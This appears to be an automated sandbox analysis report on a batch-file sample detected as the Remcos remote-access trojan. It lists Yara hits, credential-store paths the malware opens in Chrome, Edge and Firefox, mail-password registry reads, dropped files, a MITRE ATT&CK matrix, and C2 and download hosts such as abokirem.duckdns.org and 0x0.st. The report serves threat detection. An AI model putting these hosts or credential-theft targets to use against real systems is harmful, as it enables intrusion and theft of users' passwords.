                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,15_2_004082CD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_004070AE GetVersionExA,15_2_004070AE
                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 11.2.powershell.exe.9111288.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.9111288.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000002B.00000002.2404458461.0000000008C77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1738368992.0000000008969000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1682233166.00000000031AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000030.00000002.2770159710.0000000009257000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000045.00000002.4126886116.0000000007749000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.1891644249.0000000008290000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000045.00000002.4130426357.0000000007752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.3497316854.0000000009367000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000030.00000002.2678699893.0000000007840000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.1896532258.0000000008827000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.3442365078.0000000008DB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1577103646.00000000091E8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000036.00000002.3152004242.00000000094A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.2080996023.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000040.00000002.3745750171.0000000008737000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004F.00000002.3526539449.0000000002D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2065499351.0000000009407000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000030.00000002.2731153050.0000000008CCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.2225364286.0000000009057000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000040.00000002.3689742883.0000000008197000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.3330103811.0000000007990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1741165047.0000000008F17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1576231217.0000000009110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2232, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3472, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2800, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8144, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6188, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2032, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Tries to steal Mail credentials (via file registry)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: ESMTPPassword15_2_004033F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword15_2_00402DB3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword15_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IVJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IVJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-J4I3IV
                Yara detected Remcos RAT
                Source: Yara matchFile source: 11.2.powershell.exe.9111288.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.powershell.exe.9111288.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000002B.00000002.2404458461.0000000008C77000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1738368992.0000000008969000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1682233166.00000000031AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000030.00000002.2770159710.0000000009257000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000045.00000002.4126886116.0000000007749000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.1891644249.0000000008290000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000045.00000002.4130426357.0000000007752000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.3497316854.0000000009367000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000030.00000002.2678699893.0000000007840000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.1896532258.0000000008827000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.3442365078.0000000008DB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1577103646.00000000091E8000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000036.00000002.3152004242.00000000094A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.2080996023.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000040.00000002.3745750171.0000000008737000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000004F.00000002.3526539449.0000000002D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2065499351.0000000009407000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000030.00000002.2731153050.0000000008CCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.2225364286.0000000009057000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000040.00000002.3689742883.0000000008197000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000003B.00000002.3330103811.0000000007990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.1741165047.0000000008F17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1576231217.0000000009110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2232, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3472, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2800, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8144, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5808, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6188, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2032, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0042DE27 RpcBindingCreateW,15_2_0042DE27

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts1
                Windows Management Instrumentation                		1
                Scripting                		1
                DLL Side-Loading                		11
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		1
                Account Discovery                		Remote Services12
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts111
                Native API                		1
                DLL Side-Loading                		1
                Access Token Manipulation                		2
                Obfuscated Files or Information                		11
                Input Capture                		3
                File and Directory Discovery                		Remote Desktop Protocol1
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts22
                Command and Scripting Interpreter                		1
                Office Application Startup                		111
                Process Injection                		1
                Software Packing                		1
                Credentials in Registry                		13
                System Information Discovery                		SMB/Windows Admin Shares11
                Input Capture                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell                		2
                Registry Run Keys / Startup Folder                		2
                Registry Run Keys / Startup Folder                		1
                DLL Side-Loading                		NTDS111
                Security Software Discovery                		Distributed Component Object Model2
                Clipboard Data                		1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets2
                Process Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                Virtualization/Sandbox Evasion                		Cached Domain Credentials121
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture213
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                Process Injection                		Proc Filesystem1
                System Owner/User Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1612238 Sample: puDUCOeVK6.bat Startdate: 11/02/2025 Architecture: WINDOWS Score: 100 74 abokirem.duckdns.org 2->74 76 geoplugin.net 2->76 78 0x0.st 2->78 88 Suricata IDS alerts for network traffic 2->88 90 Found malware configuration 2->90 92 Malicious sample detected (through community Yara rule) 2->92 96 14 other signatures 2->96 9 cmd.exe 1 2->9         started        12 cmd.exe 1 2->12         started        14 cmd.exe 1 2->14         started        16 13 other processes 2->16 signatures3 94 Uses dynamic DNS services 74->94 process4 signatures5 106 Suspicious powershell command line found 9->106 108 Bypasses PowerShell execution policy 9->108 18 cmd.exe 3 9->18         started        21 conhost.exe 9->21         started        23 cmd.exe 2 12->23         started        25 conhost.exe 12->25         started        27 cmd.exe 2 14->27         started        29 conhost.exe 14->29         started        31 cmd.exe 2 16->31         started        33 cmd.exe 2 16->33         started        35 24 other processes 16->35 process6 signatures7 86 Suspicious powershell command line found 18->86 37 powershell.exe 19 34 18->37         started        42 conhost.exe 18->42         started        44 powershell.exe 17 23->44         started        46 conhost.exe 23->46         started        48 powershell.exe 27->48         started        50 conhost.exe 27->50         started        52 2 other processes 31->52 54 2 other processes 33->54 56 21 other processes 35->56 process8 dnsIp9 80 abokirem.duckdns.org 37.120.208.40, 49703, 49704, 56379 M247GB Romania 37->80 82 0x0.st 168.119.145.117, 443, 49702, 49706 HETZNER-ASDE Germany 37->82 84 geoplugin.net 178.237.33.50, 49705, 80 ATOM86-ASATOM86NL Netherlands 37->84 68 C:\Users\user\...\StartupScript_77a2dde7.cmd, ASCII 37->68 dropped 70 C:\ProgramData\remcos\logs.dat, data 37->70 dropped 98 Detected Remcos RAT 37->98 100 Tries to steal Mail credentials (via file registry) 37->100 102 Maps a DLL or memory area into another process 37->102 104 2 other signatures 37->104 58 powershell.exe 37->58         started        62 powershell.exe 1 37->62         started        64 powershell.exe 1 37->64         started        66 powershell.exe 37->66         started        file10 signatures11 process12 file13 72 C:\Users\user\AppData\Local\Temp\ilwtojl, Unicode 58->72 dropped 110 Tries to harvest and steal browser information (history, passwords, etc) 58->110 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.